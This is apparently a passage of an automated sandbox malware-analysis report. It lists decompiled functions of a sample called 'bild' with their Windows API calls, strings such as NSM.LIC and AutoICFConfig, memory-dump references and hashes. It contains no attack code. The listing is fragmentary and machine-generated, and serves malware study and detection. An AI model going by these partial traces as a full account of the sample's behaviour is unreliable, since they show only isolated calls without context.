                                                                                                        • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                        • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                      • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                      • API String ID: 3779116287-2600120591
                                                                                                      • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                      • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                                      • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                      • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile$CloseHandle
                                                                                                      • String ID: "
                                                                                                      • API String ID: 1443461169-123907689
                                                                                                      • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                      • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                                      • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                      • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,4764EAAA,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                      • String ID: Client$DisableGeolocation
                                                                                                      • API String ID: 3315423714-4166767992
                                                                                                      • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                      • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                                      • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                      • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                                      APIs
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                                        • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                        • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                        • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                      • TranslateMessage.USER32(?), ref: 110271F0
                                                                                                      • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                      • String ID: Exit Msgloop, quit=%d
                                                                                                      • API String ID: 3212272093-2210386016
                                                                                                      • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                      • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                                      • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                      • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 110173FD
                                                                                                        • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                                        • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                        • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                        • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                                        • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                                        • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                        • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                        • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                                      • SetEvent.KERNEL32(0000031C), ref: 1101741D
                                                                                                      • GetTickCount.KERNEL32 ref: 11017423
                                                                                                      Strings
                                                                                                      • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                      • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                      • API String ID: 3804766296-4122679463
                                                                                                      • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                      • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                                      • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                      • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C754FC4
                                                                                                      • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C758E0D,00000000,?,6C758E0D,00000000,?,00000FA0,?), ref: 6C754FE4
                                                                                                      • SetLastError.KERNEL32(00000078,00000000,?,6C758E0D,00000000,?,00000FA0,?), ref: 6C754FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                      • String ID: EnumProcessModules
                                                                                                      • API String ID: 3858832252-3735562946
                                                                                                      • Opcode ID: 53bb478fc3c4d794beac384b0b89cbcc16bb0d8fe2d965c6fa1894a29ce6b332
                                                                                                      • Instruction ID: 813962e742c35dd7203706b337a98bd1ebb20eb77c991fe611fedc87c96b65f9
                                                                                                      • Opcode Fuzzy Hash: 53bb478fc3c4d794beac384b0b89cbcc16bb0d8fe2d965c6fa1894a29ce6b332
                                                                                                      • Instruction Fuzzy Hash: 15F08C72614218AFC710DFA9D844E9B77A8EB48721F00C92AF95AD7640CA71E820DFA0
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C755014
                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C758E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C755034
                                                                                                      • SetLastError.KERNEL32(00000078,00000000,?,6C758E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C75503D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorFileLastModuleNameProc
                                                                                                      • String ID: GetModuleFileNameExA
                                                                                                      • API String ID: 4084229558-758377266
                                                                                                      • Opcode ID: 7cf2a3c031d7f80e6ea69abf8208c0234a6f3b3817f153c60a8a55e62a471640
                                                                                                      • Instruction ID: dab69f58122d8955b6e91604aa93739d948c7c3fcb02f4aa656f985e4f398e58
                                                                                                      • Opcode Fuzzy Hash: 7cf2a3c031d7f80e6ea69abf8208c0234a6f3b3817f153c60a8a55e62a471640
                                                                                                      • Instruction Fuzzy Hash: 0AF08272610618AFC720DFA8E904F5777B8EB48710F00492AF94AD7640D671F810CBF1
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                                      • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                      • String ID: *AutoICFConfig$Client
                                                                                                      • API String ID: 3257255551-59951473
                                                                                                      • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                      • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                                      • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                      • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeaveSleep
                                                                                                      • String ID: Push
                                                                                                      • API String ID: 1566154052-4278761818
                                                                                                      • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                      • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                                      • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                      • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6C79B898,00000000,?,?,?,6C75DA7F,?,00000000), ref: 6C75A503
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C75A568
                                                                                                      • Sleep.KERNEL32(00000000,?,6C75DA7F,?,00000000), ref: 6C75A581
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898,00000000), ref: 6C75A5B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 4212191310-0
                                                                                                      • Opcode ID: 2c481cabfd6929b7407482fa042c9edacfae353a784fcc4f4d7b8afe6dc85a22
                                                                                                      • Instruction ID: 94df7bac80fcf89f5797c15ef5e01dff4c160821c38d05b8a028517ddde4921a
                                                                                                      • Opcode Fuzzy Hash: 2c481cabfd6929b7407482fa042c9edacfae353a784fcc4f4d7b8afe6dc85a22
                                                                                                      • Instruction Fuzzy Hash: 372129B2A002009FDF219F1DDA45FA6B7B8EF86339F510437D81683A00DB71B8528BB1
                                                                                                      APIs
                                                                                                      • GetCommandLineA.KERNEL32 ref: 00F21027
                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00F2107B
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00F21096
                                                                                                      • ExitProcess.KERNEL32 ref: 00F210A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3509948899.0000000000F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F20000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3509933950.0000000000F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3509963877.0000000000F22000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_f20000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 2164999147-0
                                                                                                      • Opcode ID: 2cc7bdb7263b485e1a49473cafb164e42cd25afcce2a8916990478cd152a5839
                                                                                                      • Instruction ID: 4f4a9c15621ee086a706ad75225ea5123502404993ba5e473ad52aba08c28678
                                                                                                      • Opcode Fuzzy Hash: 2cc7bdb7263b485e1a49473cafb164e42cd25afcce2a8916990478cd152a5839
                                                                                                      • Instruction Fuzzy Hash: 0911DB20C043E86BEB31DF60A848BFABF957F22790F240044DCD59714AD25648C7E76D
                                                                                                      APIs
                                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
